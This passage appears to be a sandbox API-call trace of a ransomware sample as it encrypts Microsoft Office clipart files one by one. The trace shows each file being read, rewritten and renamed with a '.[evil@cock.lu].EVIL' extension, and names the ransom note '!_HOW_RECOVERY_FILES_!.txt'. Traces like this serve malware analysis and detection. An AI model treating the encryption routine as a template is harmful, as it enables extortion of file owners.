Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.699] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.699] __uncaught_exception () returned 0x84b1160800 [0146.699] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.699] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152590.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152590.wmf.[evil@cock.lu].evil")) returned 1 [0146.700] ??_V@YAXPEAX@Z () returned 0x1 [0146.703] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF", dwFileAttributes=0x200) returned 0 [0146.703] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.703] wcsstr (_Str="J0152594.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.703] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF") returned 69 [0146.703] wcscmp (_String1="J0152594.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.703] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152594.WMF") returned 0x0 [0146.703] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF") returned 0x45 [0146.703] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152594.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.705] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x18c4, lpOverlapped=0x0) returned 1 [0146.717] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.717] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.717] _errno () returned 0x84b1160840 [0146.717] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.717] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x18e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x18e0, lpOverlapped=0x0) returned 1 [0146.718] CloseHandle (hObject=0x1a8) returned 1 [0146.718] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.718] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.718] __uncaught_exception () returned 0x84b1160800 [0146.718] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.719] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152594.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152594.wmf.[evil@cock.lu].evil")) returned 1 [0146.720] ??_V@YAXPEAX@Z () returned 0x1 [0146.722] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF", dwFileAttributes=0x200) returned 0 [0146.723] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.723] wcsstr (_Str="J0152600.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.723] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF") returned 69 [0146.723] wcscmp (_String1="J0152600.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.723] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152600.WMF") returned 0x0 [0146.723] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF") returned 0x45 [0146.723] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152600.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.724] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2628, lpOverlapped=0x0) returned 1 [0146.729] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.729] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.729] _errno () returned 0x84b1160840 [0146.729] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.729] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x2640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2640, lpOverlapped=0x0) returned 1 [0146.729] CloseHandle (hObject=0x1a8) returned 1 [0146.729] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.729] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.729] __uncaught_exception () returned 0x84b1160800 [0146.729] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.730] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152600.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152600.wmf.[evil@cock.lu].evil")) returned 1 [0146.731] ??_V@YAXPEAX@Z () returned 0x1 [0146.734] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF", dwFileAttributes=0x200) returned 0 [0146.734] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.734] wcsstr (_Str="J0152602.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.734] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF") returned 69 [0146.734] wcscmp (_String1="J0152602.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.734] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152602.WMF") returned 0x0 [0146.734] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF") returned 0x45 [0146.734] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152602.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.736] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1884, lpOverlapped=0x0) returned 1 [0146.760] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.760] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.760] _errno () returned 0x84b1160840 [0146.760] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.760] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x18a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x18a0, lpOverlapped=0x0) returned 1 [0146.760] CloseHandle (hObject=0x1a8) returned 1 [0146.760] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.761] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.761] __uncaught_exception () returned 0x84b1160800 [0146.761] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.761] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152602.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152602.wmf.[evil@cock.lu].evil")) returned 1 [0146.762] ??_V@YAXPEAX@Z () returned 0x1 [0146.766] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF", dwFileAttributes=0x200) returned 0 [0146.766] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.766] wcsstr (_Str="J0152606.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.766] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF") returned 69 [0146.766] wcscmp (_String1="J0152606.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.766] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152606.WMF") returned 0x0 [0146.766] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF") returned 0x45 [0146.766] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.770] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x40f8, lpOverlapped=0x0) returned 1 [0146.773] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.773] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.773] _errno () returned 0x84b1160840 [0146.773] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.773] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x4100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4100, lpOverlapped=0x0) returned 1 [0146.773] CloseHandle (hObject=0x1a8) returned 1 [0146.773] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.773] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.773] __uncaught_exception () returned 0x84b1160800 [0146.773] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.774] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152606.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152606.wmf.[evil@cock.lu].evil")) returned 1 [0146.774] ??_V@YAXPEAX@Z () returned 0x1 [0146.777] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF", dwFileAttributes=0x200) returned 0 [0146.777] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.777] wcsstr (_Str="J0152608.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.777] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF") returned 69 [0146.777] wcscmp (_String1="J0152608.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.777] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152608.WMF") returned 0x0 [0146.777] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF") returned 0x45 [0146.777] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152608.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.779] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3094, lpOverlapped=0x0) returned 1 [0146.782] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.782] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.782] _errno () returned 0x84b1160840 [0146.782] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.782] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x30a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x30a0, lpOverlapped=0x0) returned 1 [0146.783] CloseHandle (hObject=0x1a8) returned 1 [0146.783] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.783] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.783] __uncaught_exception () returned 0x84b1160800 [0146.783] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.783] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152608.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152608.wmf.[evil@cock.lu].evil")) returned 1 [0146.784] ??_V@YAXPEAX@Z () returned 0x1 [0146.787] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF", dwFileAttributes=0x200) returned 0 [0146.787] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.787] wcsstr (_Str="J0152610.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.787] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF") returned 69 [0146.787] wcscmp (_String1="J0152610.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.787] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152610.WMF") returned 0x0 [0146.787] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF") returned 0x45 [0146.787] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152610.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.789] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1748, lpOverlapped=0x0) returned 1 [0146.809] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.809] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.809] _errno () returned 0x84b1160840 [0146.809] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.809] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1760, lpOverlapped=0x0) returned 1 [0146.809] CloseHandle (hObject=0x1a8) returned 1 [0146.809] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.810] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.810] __uncaught_exception () returned 0x84b1160800 [0146.810] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.810] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152610.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152610.wmf.[evil@cock.lu].evil")) returned 1 [0146.811] ??_V@YAXPEAX@Z () returned 0x1 [0146.814] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF", dwFileAttributes=0x200) returned 0 [0146.815] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.815] wcsstr (_Str="J0152622.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.815] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF") returned 69 [0146.815] wcscmp (_String1="J0152622.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.815] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152622.WMF") returned 0x0 [0146.815] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF") returned 0x45 [0146.815] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152622.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.817] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2584, lpOverlapped=0x0) returned 1 [0146.819] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.819] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.819] _errno () returned 0x84b1160840 [0146.820] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.820] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x25a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x25a0, lpOverlapped=0x0) returned 1 [0146.820] CloseHandle (hObject=0x1a8) returned 1 [0146.820] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.820] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.820] __uncaught_exception () returned 0x84b1160800 [0146.820] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.820] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152622.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152622.wmf.[evil@cock.lu].evil")) returned 1 [0146.821] ??_V@YAXPEAX@Z () returned 0x1 [0146.824] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF", dwFileAttributes=0x200) returned 0 [0146.824] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.824] wcsstr (_Str="J0152626.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.824] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF") returned 69 [0146.824] wcscmp (_String1="J0152626.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.824] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152626.WMF") returned 0x0 [0146.825] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF") returned 0x45 [0146.825] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152626.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.829] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6688, lpOverlapped=0x0) returned 1 [0146.832] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.832] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.832] _errno () returned 0x84b1160840 [0146.832] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.832] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x66a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x66a0, lpOverlapped=0x0) returned 1 [0146.832] CloseHandle (hObject=0x1a8) returned 1 [0146.832] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.833] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.833] __uncaught_exception () returned 0x84b1160800 [0146.833] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.833] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152626.wmf"), lpNewFileName="C:\\\\Program 